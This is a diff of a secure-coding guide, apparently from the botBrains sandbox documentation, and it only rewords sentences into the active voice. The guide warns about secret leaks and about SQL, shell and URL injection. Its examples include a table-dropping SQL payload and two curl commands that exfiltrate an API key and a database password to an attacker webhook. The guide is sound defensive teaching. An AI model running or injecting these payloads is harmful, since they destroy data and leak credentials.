Skip to main content

 The isolated sandbox protects botBrains and other customers-but injection vulnerabilities in your code put your own systems at risk.
 Attackers could steal your credentials, exfiltrate data from your databases, or escalate privileges on your external systems.
 Secret leaks.
 Never log or return sensitive values:

 SQL injection.
-When user input is interpolated directly into SQL queries, attackers can execute arbitrary database commands.
+When you interpolate user input directly into SQL queries, attackers can execute arbitrary database commands.
 A malicious order_id like '; DROP TABLE orders; -- could delete your data.

 Prefer Python for database operations.
 Its parameterized queries are more robust and harder to misuse than shell alternatives.

 Shell injection.
-When user input is passed to shell commands without proper escaping, attackers can execute arbitrary commands.
+When you pass user input to shell commands without proper escaping, attackers can execute arbitrary commands.
 A malicious input like "; curl -X POST -d "$API_KEY" https://webhook.site/attacker-id # could exfiltrate your secrets to an attacker-controlled server.

 URL injection.
-When user input is placed directly in URLs, attackers can manipulate the request destination or parameters.
+When you place user input directly in URLs, attackers can manipulate the request destination or parameters.
 A malicious input like x]"; curl -d "$DB_PASSWORD" https://webhook.site/attacker-id # could steal credentials.

 Prohibited activities